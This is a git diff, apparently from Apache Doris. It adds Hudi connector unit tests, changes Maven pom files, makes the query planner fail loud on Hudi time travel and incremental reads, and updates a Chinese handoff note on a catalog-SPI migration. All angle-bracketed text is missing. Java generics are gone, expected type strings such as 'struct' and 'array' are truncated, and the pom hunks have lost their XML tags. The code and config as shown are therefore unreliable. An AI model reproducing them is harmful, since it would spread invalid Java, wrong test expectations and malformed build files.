Assertions.assertEquals(EXPECTED_HIVE_TYPES.size(), fields.size()); + for (int i = 0; i < fields.size(); i++) { + Assertions.assertEquals(EXPECTED_HIVE_TYPES.get(i), + HudiTypeMapping.toHiveTypeString(fields.get(i).schema()), "colType[" + i + "]"); + } + } + + @Test + public void testTopLevelNameLoweredButNestedStructNamePreserved() { + List columns = HudiConnectorMetadata.avroSchemaToColumns(schema()); + ConnectorColumn addr = columns.get(7); + // top-level "Addr" -> "addr" + Assertions.assertEquals("addr", addr.getName()); + // nested struct field "Street" keeps its case (legacy lowercases only top-level) + Assertions.assertEquals(Arrays.asList("Street", "zip"), addr.getType().getFieldNames()); + Assertions.assertEquals("struct", + HudiTypeMapping.toHiveTypeString(schema().getFields().get(7).schema())); + } +} diff --git a/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTableTypeTest.java b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTableTypeTest.java new file mode 100644 index 00000000000000..ef172b9dc17ce6 --- /dev/null +++ b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTableTypeTest.java @@ -0,0 +1,148 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hudi; + +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.hms.HmsClient; +import org.apache.doris.connector.hms.HmsDatabaseInfo; +import org.apache.doris.connector.hms.HmsPartitionInfo; +import org.apache.doris.connector.hms.HmsTableInfo; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * COW vs MOR table-type classification on the SPI Hudi metadata path (P3-T07, batch C). + * + *

WHY: schema derivation is table-type-agnostic, so the ONLY place the metadata SPI + * distinguishes Copy-On-Write from Merge-On-Read is {@code detectHudiTableType}, surfaced + * through {@code getTableHandle}. Misclassifying the type routes scan planning to the wrong + * split/reader strategy. These tests pin the detection from the HMS input format and the + * Spark provider table parameter — the "COW & MOR each one" parity requirement — plus the + * UNKNOWN fallback when no Hudi signal is present.

+ */ +public class HudiTableTypeTest { + + private String detect(String inputFormat, Map parameters) { + HmsTableInfo info = HmsTableInfo.builder() + .dbName("db").tableName("t") + .location("s3://b/t") + .inputFormat(inputFormat) + .parameters(parameters) + .build(); + HudiConnectorMetadata metadata = + new HudiConnectorMetadata(new FakeHmsClient(info), Collections.emptyMap()); + Optional handle = metadata.getTableHandle(null, "db", "t"); + Assertions.assertTrue(handle.isPresent()); + return ((HudiTableHandle) handle.get()).getHudiTableType(); + } + + @Test + public void testCowDetectedFromInputFormat() { + Assertions.assertEquals("COPY_ON_WRITE", + detect("org.apache.hudi.hadoop.HoodieParquetInputFormat", Collections.emptyMap())); + } + + @Test + public void testCowDetectedFromSparkProviderParam() { + // A Spark-registered Hudi table may carry no Hudi input format; the provider + // parameter still identifies it as COW. + Assertions.assertEquals("COPY_ON_WRITE", + detect(null, Collections.singletonMap("spark.sql.sources.provider", "hudi"))); + } + + @Test + public void testMorDetectedFromRealtimeInputFormat() { + Assertions.assertEquals("MERGE_ON_READ", + detect("org.apache.hudi.hadoop.realtime.HoodieParquetRealtimeInputFormat", + Collections.emptyMap())); + } + + @Test + public void testUnknownWhenNoHudiSignal() { + Assertions.assertEquals("UNKNOWN", + detect("org.apache.hadoop.mapred.TextInputFormat", Collections.emptyMap())); + } + + /** + * Minimal {@link HmsClient} double returning a fixed table. Only {@code tableExists} + * and {@code getTable} are exercised by {@code getTableHandle}; the rest fail loud. + */ + private static final class FakeHmsClient implements HmsClient { + private final HmsTableInfo tableInfo; + + FakeHmsClient(HmsTableInfo tableInfo) { + this.tableInfo = tableInfo; + } + + @Override + public boolean tableExists(String dbName, String tableName) { + return true; + } + + @Override + public HmsTableInfo getTable(String dbName, String tableName) { + return tableInfo; + } + + @Override + public List listDatabases() { + throw new UnsupportedOperationException(); + } + + @Override + public HmsDatabaseInfo getDatabase(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public List listTables(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public Map getDefaultColumnValues(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public List listPartitionNames(String dbName, String tableName, int maxParts) { + throw new UnsupportedOperationException(); + } + + @Override + public List getPartitions(String dbName, String tableName, + List partNames) { + throw new UnsupportedOperationException(); + } + + @Override + public HmsPartitionInfo getPartition(String dbName, String tableName, List values) { + throw new UnsupportedOperationException(); + } + + @Override + public void close() { + } + } +} diff --git a/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTypeMappingTest.java b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTypeMappingTest.java new file mode 100644 index 00000000000000..669d5f4f96b9b3 --- /dev/null +++ b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTypeMappingTest.java @@ -0,0 +1,220 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hudi; + +import org.apache.doris.connector.api.ConnectorType; + +import org.apache.avro.LogicalTypes; +import org.apache.avro.Schema; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; + +/** + * Tests {@link HudiTypeMapping#toHiveTypeString} and {@link HudiTypeMapping#fromAvroSchema}. + * + *

WHY (toHiveTypeString): the BE Hudi JNI scanner ({@code HadoopHudiJniScanner}) + * parses {@code hudi_column_types} as Hive type strings split on {@code '#'}. The FE + * must therefore emit full Hive type strings carrying precision/scale and + * subtypes — not Doris type names — or the scanner reads wrong/null columns. + * These tests pin the exact strings, matching fe-core + * {@code HudiUtils.convertAvroToHiveType}.

+ * + *

WHY (fromAvroSchema): {@code getTableSchema} reports each column's + * {@link ConnectorType} from this mapper. These tests pin the Doris type per Avro + * type, matching fe-core {@code HudiUtils.fromAvroHudiTypeToDorisType} (P3-T07 + * parity baseline — previously uncovered). Note the deliberate asymmetry: time + * types map to {@code TIMEV2} here but fail loud in {@code toHiveTypeString}, + * exactly as the two legacy converters diverge.

+ */ +public class HudiTypeMappingTest { + + @Test + public void testPrimitives() { + Assertions.assertEquals("boolean", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.BOOLEAN))); + Assertions.assertEquals("int", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.INT))); + Assertions.assertEquals("bigint", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.LONG))); + Assertions.assertEquals("float", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.FLOAT))); + Assertions.assertEquals("double", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.DOUBLE))); + Assertions.assertEquals("string", HudiTypeMapping.toHiveTypeString(Schema.create(Schema.Type.STRING))); + } + + @Test + public void testDateAndTimestampLogicalTypes() { + Schema date = LogicalTypes.date().addToSchema(Schema.create(Schema.Type.INT)); + Assertions.assertEquals("date", HudiTypeMapping.toHiveTypeString(date)); + + Schema tsMillis = LogicalTypes.timestampMillis().addToSchema(Schema.create(Schema.Type.LONG)); + Assertions.assertEquals("timestamp", HudiTypeMapping.toHiveTypeString(tsMillis)); + + Schema tsMicros = LogicalTypes.timestampMicros().addToSchema(Schema.create(Schema.Type.LONG)); + Assertions.assertEquals("timestamp", HudiTypeMapping.toHiveTypeString(tsMicros)); + } + + @Test + public void testDecimalKeepsPrecisionAndScale() { + // Directly targets bug (a): getTypeName() previously dropped precision/scale. + Schema decimal = LogicalTypes.decimal(10, 2).addToSchema(Schema.create(Schema.Type.BYTES)); + Assertions.assertEquals("decimal(10,2)", HudiTypeMapping.toHiveTypeString(decimal)); + + Schema decimalFixed = LogicalTypes.decimal(38, 18) + .addToSchema(Schema.createFixed("d", null, null, 16)); + Assertions.assertEquals("decimal(38,18)", HudiTypeMapping.toHiveTypeString(decimalFixed)); + } + + @Test + public void testArray() { + Schema arr = Schema.createArray(Schema.create(Schema.Type.INT)); + Assertions.assertEquals("array", HudiTypeMapping.toHiveTypeString(arr)); + } + + @Test + public void testMap() { + // Avro maps always have string keys. + Schema map = Schema.createMap(Schema.create(Schema.Type.LONG)); + Assertions.assertEquals("map", HudiTypeMapping.toHiveTypeString(map)); + } + + @Test + public void testStructContainsCommas() { + // Directly targets bug (b): the comma in struct<...> must survive as a + // single type string; a comma join+split would shatter it. + Schema struct = Schema.createRecord("r", null, null, false, Arrays.asList( + new Schema.Field("a", Schema.create(Schema.Type.INT)), + new Schema.Field("b", Schema.create(Schema.Type.STRING)))); + Assertions.assertEquals("struct", HudiTypeMapping.toHiveTypeString(struct)); + } + + @Test + public void testNestedComplexType() { + Schema struct = Schema.createRecord("r", null, null, false, Arrays.asList( + new Schema.Field("id", Schema.create(Schema.Type.LONG)), + new Schema.Field("amount", + LogicalTypes.decimal(12, 4).addToSchema(Schema.create(Schema.Type.BYTES))))); + Schema arrOfStruct = Schema.createArray(struct); + Assertions.assertEquals("array>", + HudiTypeMapping.toHiveTypeString(arrOfStruct)); + } + + @Test + public void testNullableUnionIsUnwrapped() { + Schema nullableInt = Schema.createUnion( + Schema.create(Schema.Type.NULL), Schema.create(Schema.Type.INT)); + Assertions.assertEquals("int", HudiTypeMapping.toHiveTypeString(nullableInt)); + } + + @Test + public void testUnsupportedLogicalTypeFailsLoud() { + // Matches legacy fail-loud: time types are unsupported. + Schema timeMillis = LogicalTypes.timeMillis().addToSchema(Schema.create(Schema.Type.INT)); + Assertions.assertThrows(IllegalArgumentException.class, + () -> HudiTypeMapping.toHiveTypeString(timeMillis)); + } + + // ===== fromAvroSchema -> ConnectorType (parity with HudiUtils.fromAvroHudiTypeToDorisType) ===== + + @Test + public void testFromAvroSchemaPrimitives() { + Assertions.assertEquals(ConnectorType.of("BOOLEAN"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.BOOLEAN))); + Assertions.assertEquals(ConnectorType.of("INT"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.INT))); + Assertions.assertEquals(ConnectorType.of("BIGINT"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.LONG))); + Assertions.assertEquals(ConnectorType.of("FLOAT"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.FLOAT))); + Assertions.assertEquals(ConnectorType.of("DOUBLE"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.DOUBLE))); + Assertions.assertEquals(ConnectorType.of("STRING"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.STRING))); + // Avro bytes/fixed without a decimal logical type degrade to STRING (legacy parity). + Assertions.assertEquals(ConnectorType.of("STRING"), + HudiTypeMapping.fromAvroSchema(Schema.create(Schema.Type.BYTES))); + } + + @Test + public void testFromAvroSchemaLogicalTypes() { + Assertions.assertEquals(ConnectorType.of("DATEV2"), + HudiTypeMapping.fromAvroSchema( + LogicalTypes.date().addToSchema(Schema.create(Schema.Type.INT)))); + Assertions.assertEquals(ConnectorType.of("DATETIMEV2", 3, 0), + HudiTypeMapping.fromAvroSchema( + LogicalTypes.timestampMillis().addToSchema(Schema.create(Schema.Type.LONG)))); + Assertions.assertEquals(ConnectorType.of("DATETIMEV2", 6, 0), + HudiTypeMapping.fromAvroSchema( + LogicalTypes.timestampMicros().addToSchema(Schema.create(Schema.Type.LONG)))); + // Time types map to TIMEV2 here, unlike toHiveTypeString which fails loud — + // matching legacy HudiUtils.fromAvroHudiTypeToDorisType. + Assertions.assertEquals(ConnectorType.of("TIMEV2", 3, 0), + HudiTypeMapping.fromAvroSchema( + LogicalTypes.timeMillis().addToSchema(Schema.create(Schema.Type.INT)))); + Assertions.assertEquals(ConnectorType.of("TIMEV2", 6, 0), + HudiTypeMapping.fromAvroSchema( + LogicalTypes.timeMicros().addToSchema(Schema.create(Schema.Type.LONG)))); + } + + @Test + public void testFromAvroSchemaDecimalKeepsPrecisionAndScale() { + Schema decimal = LogicalTypes.decimal(10, 2).addToSchema(Schema.create(Schema.Type.BYTES)); + Assertions.assertEquals(ConnectorType.of("DECIMALV3", 10, 2), + HudiTypeMapping.fromAvroSchema(decimal)); + } + + @Test + public void testFromAvroSchemaComplexTypes() { + Assertions.assertEquals( + ConnectorType.arrayOf(ConnectorType.of("INT")), + HudiTypeMapping.fromAvroSchema(Schema.createArray(Schema.create(Schema.Type.INT)))); + // Avro maps always have string keys. + Assertions.assertEquals( + ConnectorType.mapOf(ConnectorType.of("STRING"), ConnectorType.of("BIGINT")), + HudiTypeMapping.fromAvroSchema(Schema.createMap(Schema.create(Schema.Type.LONG)))); + Schema struct = Schema.createRecord("r", null, null, false, Arrays.asList( + new Schema.Field("a", Schema.create(Schema.Type.INT)), + new Schema.Field("b", Schema.create(Schema.Type.STRING)))); + Assertions.assertEquals( + ConnectorType.structOf(Arrays.asList("a", "b"), + Arrays.asList(ConnectorType.of("INT"), ConnectorType.of("STRING"))), + HudiTypeMapping.fromAvroSchema(struct)); + } + + @Test + public void testFromAvroSchemaNullableUnionUnwrapped() { + Schema nullableInt = Schema.createUnion( + Schema.create(Schema.Type.NULL), Schema.create(Schema.Type.INT)); + Assertions.assertEquals(ConnectorType.of("INT"), + HudiTypeMapping.fromAvroSchema(nullableInt)); + } + + @Test + public void testFromAvroSchemaEnumMapsToString() { + Schema enumSchema = Schema.createEnum("e", null, null, Arrays.asList("A", "B")); + Assertions.assertEquals(ConnectorType.of("STRING"), + HudiTypeMapping.fromAvroSchema(enumSchema)); + } + + @Test + public void testFromAvroSchemaMultiMemberUnionUnsupported() { + // A true union (no single non-null member) is unsupported (legacy parity). + Schema union = Schema.createUnion( + Schema.create(Schema.Type.INT), Schema.create(Schema.Type.STRING)); + Assertions.assertEquals(ConnectorType.of("UNSUPPORTED"), + HudiTypeMapping.fromAvroSchema(union)); + } +} diff --git a/fe/fe-core/pom.xml b/fe/fe-core/pom.xml index f78b2068b5b51a..a8ea60e852421a 100644 --- a/fe/fe-core/pom.xml +++ b/fe/fe-core/pom.xml @@ -68,6 +68,16 @@ under the License. ${project.groupId} fe-common ${project.version} + + + + org.eclipse.jetty.toolchain + jetty-jakarta-servlet-api + + @@ -736,6 +746,16 @@ under the License. org.immutables value + + + jakarta.servlet + jakarta.servlet-api + ${jakarta.servlet-api.version} + io.airlift concurrent @@ -774,8 +794,11 @@ under the License. mockito-inline test - + it.unimi.dsi fastutil-core @@ -931,6 +954,48 @@ under the License. + + + org.apache.maven.plugins + maven-shade-plugin + + + bundle-fastutil-into-doris-fe + package + + shade + + + + false + + + + it.unimi.dsi:fastutil-core + + + + + *:* + + META-INF/*.SF + META-INF/*.DSA + META-INF/*.RSA + module-info.class + + + + + + + org.apache.maven.plugins maven-assembly-plugin diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java index b90e759d81d6ad..f9b16736da5014 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java @@ -822,17 +822,28 @@ public PlanFragment visitPhysicalHudiScan(PhysicalHudiScan hudiScan, PlanTransla TupleDescriptor tupleDescriptor = generateTupleDesc(slots, table, context); SessionVariable sv = ConnectContext.get().getSessionVariable(); - // Plugin-driven (SPI) Hudi: route through PluginDrivenScanNode. Incremental scan - // (hudiScan.getIncrementalRelation) is not yet representable in the SPI; that - // gap is tracked for P3 when Hudi migrates to the connector framework. + // Plugin-driven (SPI) Hudi: route through PluginDrivenScanNode. if (table instanceof PluginDrivenExternalTable) { + // Fail loud: the SPI Hudi path does not yet honor time travel or incremental + // reads. HudiScanPlanProvider always reads the latest snapshot, and the + // incremental relation has no SPI representation, so honoring them silently + // would return wrong results (latest snapshot / full scan instead). Full + // support is deferred to the Hudi connector live cutover (batch E); see + // plan-doc DV-006 / tasks/P3. + if (hudiScan.getIncrementalRelation().isPresent()) { + throw new AnalysisException("Hudi incremental read is not yet supported via the " + + "catalog SPI; it is deferred to the Hudi connector migration."); + } + if (hudiScan.getTableSnapshot().isPresent()) { + throw new AnalysisException("Hudi time travel (FOR TIME/VERSION AS OF) is not yet " + + "supported via the catalog SPI; it is deferred to the Hudi connector migration."); + } PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) table.getCatalog(); ScanNode scanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext(), pluginCatalog, (PluginDrivenExternalTable) table); FileQueryScanNode fileScan = (FileQueryScanNode) scanNode; - hudiScan.getTableSnapshot().ifPresent(fileScan::setQueryTableSnapshot); hudiScan.getScanParams().ifPresent(fileScan::setScanParams); return getPlanFragmentForPhysicalFileScan(hudiScan, context, scanNode); } diff --git a/fe/pom.xml b/fe/pom.xml index 2b44718723b05a..73c055dfa37778 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -278,6 +278,11 @@ under the License. 2.16.0 3.18.2-GA 3.1.0 + + 6.1.0 18.3.14-doris-SNAPSHOT 2.18.0 1.11.0 diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 52adf21f2567ef..9bda3254c43b26 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -8,130 +8,123 @@ ## 📅 最后一次 handoff -- **日期 / 时间**:2026-06-04 -- **本 session 主题**:**P2 批 C+D+E 连续完成**(T07 翻闸 → T08-T10 删 legacy → T11 单测 → T13 文档),**T12 推迟**,**PR 待开**(分支基线对齐由用户处理) -- **分支**:`catalog-spi-03` +- **日期 / 时间**:2026-06-05 +- **本 session 主题**:**P3 批 D 完成(T08,design-only)**——`tableFormatType` 分流消费设计备忘 + **[D-020]**(用户签字 M2=方案 B per-table SPI provider)。**P3 hybrid in-scope(批 A–D)全部完成**;剩批 E(live cutover)并入 P7。**P3 PR [#64143](https://github.com/apache/doris/pull/64143) 已开**(base branch-catalog-spi)。 +- **分支**:`catalog-spi-04`(P3 工作分支,基于 `branch-catalog-spi`)。工作树预期 clean(仅本地未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.bak`;**`plan-doc/research/` 本 session 已纳入 git 跟踪**)。 --- ## ✅ 本 session 完成项 -> 注:用户本 session 开始前把 `catalog-spi-03` **rebase 到了新 master**,所有旧 commit hash 已变。下方为 rebase 后的新 hash。 +| Task | 结果 | commits | +|---|---|---| +| **P3-T08** tableFormatType 分流消费设计备忘 | ✅ design-only(零代码);产出设计备忘 + [D-020](M2=方案 B);核心拆解 M1⊥M2 | 本 doc commit | -### 批 C — T07 翻闸(commit `0fe4b8a93d6`) +**净产出** = 设计备忘 `designs/P3-T08-tableformat-dispatch-design.md` + 决策 D-020 + 把上 session 的 recon 研究文件纳入跟踪。**P3 hybrid 全部 in-scope(批 A–D)完成**:2 正确性修(T02/T05)+ 2 fail-loud/决策(T04/T06)+ 测试网零→59 测(T07)+ 模型 dispatch 设计(T08/D-020)。 -`CatalogFactory.java:53` `SPI_READY_TYPES` 加 `"trino-connector"`(顺手删上方注释里过时的 trino 列举)。这一步把 `CREATE CATALOG type='trino-connector'` 路由到 SPI(`PluginDrivenExternalCatalog`),关闭了批 B→批 C 的 regression window。compile + checkstyle 绿。 +**commit stack**(新→旧):本 doc commit→`76586b2`(批 C handoff)→`435065f`(T07 feat)→`04f6576`(批 B handoff)→`10b72d4`(T05)→`301fe38`(批 A handoff)→`2758cf9`(T04 doc)→`feceabb`(T04)→`517c9cf`(T03 defer)→`ac0dc7c`(T02 doc)→`95f23e9`(T02)→`9fcf21a`(recon/D-019)→`0793f03`(P2)→`2b1a3bb`(P1)→`72d6d01`(P0)。 -### 批 D — 删 fe-core legacy trino 代码(commit `ed81a063fe8`,14 文件 / +1 −2508) +--- -- **T08** `PhysicalPlanTranslator`:删 `instanceof TrinoConnectorExternalTable` scan 分支 + 2 import(`PluginDrivenExternalTable` SPI 前置分支接管)。 -- **T09** `CatalogFactory`:删 `case "trino-connector"` + import。 -- **T10**:删 `datasource/trinoconnector/` 整目录(10 文件)+ 删 legacy 测试 `TrinoConnectorPredicateTest`。 -- **DV-001(HANDOFF 原计划漏项,recon 补回)**:`ExternalCatalog.java:948` `case TRINO_CONNECTOR` 改返 `PluginDrivenExternalDatabase`(照搬已迁移的 JDBC case,line 936)+ 删 import。 -- **有意保留**:`MetastoreProperties.Type.TRINO_CONNECTOR` + `TrinoConnectorPropertiesFactory`(属性子系统,不引用被删目录,SPI 路径可能仍需);`InitCatalogLog.Type.TRINO_CONNECTOR` + `TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` 枚举(image compat);`GsonUtils` 3 个 label redirect(批 B 已处理,T10 **不碰** GsonUtils)。 -- 守门:fe-core `clean test-compile`(main+test)BUILD SUCCESS、checkstyle 0、fe-connector import-gate SUCCESS。 +## 🚧 未完成 / 待办(下一 session:三选一,待用户定) -### 批 E — T11 单测(commit `9bba12a44b2`,3 文件 / +441) +**P3 hybrid in-scope(批 A–D)已全部完成,PR #64143 已开。** 没有"批 D 之后的批"——批 E 是 deferred、并入 P7。下一 session: -3 个 JUnit5(Jupiter)纯转换器测试,**29 测试全绿**,checkstyle 0,本地 `mvn -pl fe-connector/fe-connector-trino -am test` 可跑: -- `TrinoPredicateConverterTest`(14)— `ConnectorExpression` pushdown → Trino `TupleDomain`(EQ/range/NE/IN/NOT IN/IS [NOT] NULL/AND/OR、Slice 编码、null/unsupported 优雅降级到 `all()`)。 -- `TrinoTypeMappingTest`(11)— Trino type → Doris `ConnectorType`(标量、decimal 精度/scale、timestamp 精度 clamp 到 6、array/map/struct、unknown 抛错)。 -- `TrinoConnectorProviderTest`(4)— `validateProperties` 缺/空 `trino.connector.name` fail-fast(批 A T01)。 -- **DV-002**:fe-connector-trino 无 Mockito、`TrinoJsonSerializer` 非纯单元(需 plugin 的 HandleResolver+TypeRegistry)→ 砍 json/schema,用 `validateProperties` 替补第 3 类;plugin 依赖路径由现有 `external_table_p0/p2` trino_connector regression 套件覆盖。 +1. **监控 [PR #64143](https://github.com/apache/doris/pull/64143)**:base = `apache/doris:branch-catalog-spi`、head = `morningman:catalog-spi-04`,26 files +3065/−154、12 commits。盯 CI、处理 review comment(review 改动在本分支 `catalog-spi-04` 续 commit + push 即自动进 PR)。前序 P0/P1/P2 PR 均 **squash-merge**。 +2. **批 E 并入 P7**(不在 P3 编码):live cutover——见下「批 E backlog」。属 hive/HMS migration(P7 或专门子阶段),不在本 PR 内。 +3. **启 P4**(maxcompute):若 P3 告一段落,按 master plan 进下一连接器。 -### T13 — 跟踪文档同步(本次提交) +> ⚠️ 三选项**都不应**在 P3 分支内碰 `SPI_READY_TYPES` / fe-core 消费实现 / legacy `datasource/hudi/` / 非 hudi 连接器——皆批 E。 -PROGRESS / tasks/P2 / connectors/trino-connector.md / deviations-log(DV-001..004)/ 本 HANDOFF 全部翻到 P2 完成态。 +### 批 E backlog(登记,不在 P3 编码;T08/D-020 已为其出设计) +- **M1**(T08 设计):fe-core `PluginDrivenExternalTable` 消费 `tableFormatType`——`PluginDrivenSchemaCacheValue` 缓存格式 + `getEngine/getEngineTableTypeName` per-table 化(opaque 串、热路径不读)。 +- **M2**(T08/D-020 设计):新增 default `ConnectorMetadata.getScanPlanProvider(handle)` + fe-core `PluginDrivenScanNode.getSplits` 优先 per-table 回落 per-catalog + hms 网关按 `handle.getTableType()` 委派。 +- T03 schema_id/history 完整 field-id evolution(DV-006) +- T05 `listPartitions*` override(DV-007);T06 完整 MVCC(DV-007);T04 完整 snapshot 透传 + 增量 SPI +- **T07 gap-2**:Hudi meta-field 纳入(`getTableAvroSchema()` 无参 vs legacy `(true)`)真实 fixture 实证(DV-008);gap-1 余项 `ThriftHmsClient` 源头防御降字(DV-008) +- T09–T11(模型落地/gate flip/删 legacy/集群验证);Iceberg-on-hms 经 SPI 依赖 **P6** 补 `IcebergScanPlanProvider`(M3);探测共享化消 drift(M5,P7) +- 端到端/集群验证(COW/MOR schema vs live legacy、BE JNI parse parity、混合多格式 catalog) --- -## 🚧 未完成 / 待办 +## ⚠️ 关键认知 / 临时发现 -1. **PR 未开 —— 阻塞于分支基线错位(用户处理)**。`catalog-spi-03` 现基于**新 master**(含 `#63823 split fe-sql-parser`、`#64016 TLS` 等 master-only commit),而远端 `apache/doris:branch-catalog-spi` 仍停在 P1 merge `778c5dd610f`(旧 master 基线);两者分叉于 `68d4eb308e5`(#63552)。`git rev-list --count upstream-apache/branch-catalog-spi..HEAD` = **191**(仅顶部 7 个是 P2)。**直接开 `catalog-spi-03 → branch-catalog-spi` 会是 191-commit 的错误巨型 PR**。等用户对齐分支后再开。 -2. **T12 回归测试推迟**(DV-003)——`trino_connector_migration_compat`(CREATE CATALOG→image→重启读回 + 旧 image 含 `TRINO_CONNECTOR` 枚举反序列化),需有 Trino plugin + docker/集群的环境。 +### 1.【T08/D-020 新结论】keystone gap = M1(身份消费)⊥ M2(scan 路由),可分离 +- `tableFormatType` **产而不用**:`HiveConnectorMetadata.getTableSchema` 设了它,但 `PluginDrivenExternalTable.initSchema:79-109` **只读 `getColumns()`**、丢 `getTableFormatType()`(本 session firsthand 核读确认)。第二缺口:`getEngine:195-215`/`getEngineTableTypeName:217-231` switch **catalog type** 非 per-table format。 +- **M1**(fe-core 读格式做 per-table 引擎名/身份,**opaque 串、热路径不读**)在 A/B/C **三方案通用**;**M2**(单 hms connector 产 Hudi/Iceberg scan plan)才是 A/B/C 分歧处。→ keystone 可控化。 +- **M2 = 方案 B**([D-020],用户签字):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`(默认 null→回落 per-catalog `Connector.getScanPlanProvider()`),fe-core `PluginDrivenScanNode.getSplits` 优先 per-table、回落 per-catalog。前提:`ConnectorScanPlanProvider.planScan:62-66` 入参已带 per-table handle(本 session 核实)。**A 备选**(连接器内 router,零 SPI churn);**C 否决**(fe-core 长格式分派,违瘦 fe-core)。 +- **D-020 细化 D-005**(非推翻):tableFormatType 区分符沿用;D-005 的"fe-core→PhysicalXxxScan"措辞早于 P1 scan-node 统一,由 per-table provider seam 取代。**批 E 实现别按 D-005 旧措辞做 PhysicalXxxScan**。 ---- +### 2.【批 C 已用,批 E 仍需】parity 可行性 = golden-value(无跨模块编译路径) +- `fe-core` 只依赖 `fe-connector-api` + `fe-connector-spi`,**不依赖**具体 `-hudi`/`-hms`/`-hive` 模块;连接器模块不依赖 fe-core。import-gate(`tools/check-connector-imports.sh`)**只扫 `*/src/main/java`、只禁 connector→fe-core 单向**(test 豁免,但无编译路径仍使跨模块 parity 不可行)。 +- → legacy↔SPI parity 用 **golden 值**(注 legacy `file:line`)。测试栈 **JUnit5 only,无 mockito**,替身手写(`FakeHmsClient` 先例)。checkstyle **含 test 源**(`fe/pom.xml:162`)、**禁 static import**(用 `Assertions.assertX`)、**test 阶段不跑 checkstyle** → 单独 `mvn -pl checkstyle:check`。 -## ⚠️ 关键认知 / 临时发现 +### 3.【批 C 关键结论】COW/MOR schema = type-agnostic +- legacy `HMSExternalTable.initHudiSchema` 与 SPI `HudiConnectorMetadata.getTableSchema`→`avroSchemaToColumns` 都从**同一 avro schema** 推导列表,**零表型分支**。COW/MOR 区别**只在 scan planning**(`HudiScanPlanProvider.planScan:92`:COW=base files native、MOR=merged slices + delta logs JNI)。→ schema parity 是 avro→column 纯函数;表型只影响 `detectHudiTableType` + split 收集。 -1. **rebase 后 fe-core 编译坑(非代码问题)**:本场最大时间消耗。rebase 拉入 `#63823`(nereids 语法从 fe-core 拆到新模块 `fe-sql-parser`)后,`fe-core/target/generated-sources/.../DorisParser.java` 旧生成物残留(git 不管 target/),FQCN 撞名盖过 fe-sql-parser 依赖里的新版 → `LogicalPlanBuilder` 报 `cannot find symbol HOT()/expression()`。**修法:`clean` fe-core**(旧生成物删除、fe-core 已无 grammar 不会再生成)。只 clean fe-sql-parser 不够。任何 rebase 后遇此症状先 clean fe-core,别当代码 bug 查。 -2. **`MetastoreProperties` trino 条目有意保留**:它在 `property/metastore/` 子系统、不引用被删目录、删之不影响编译,但 SPI 建 catalog 可能仍走它解析属性。批 D 不动它;是否死代码留待后续评估(DV-001 后续动作)。 -3. **docs-next 不在本代码仓**:用户向文档在 doris-website 仓(DV-004)。本仓只有 `docs/`。 -4. (沿用)`tools/check-connector-imports.sh` import gate:fe-core 不能 import `org.apache.doris.connector.*`。 -5. (沿用)P1 fallback:`PhysicalPlanTranslator` 里其余 6 个连接器的 instanceof 分支待 P3-P7 各自迁完时删;本场只清了 trino 那一支(T08)。 +### 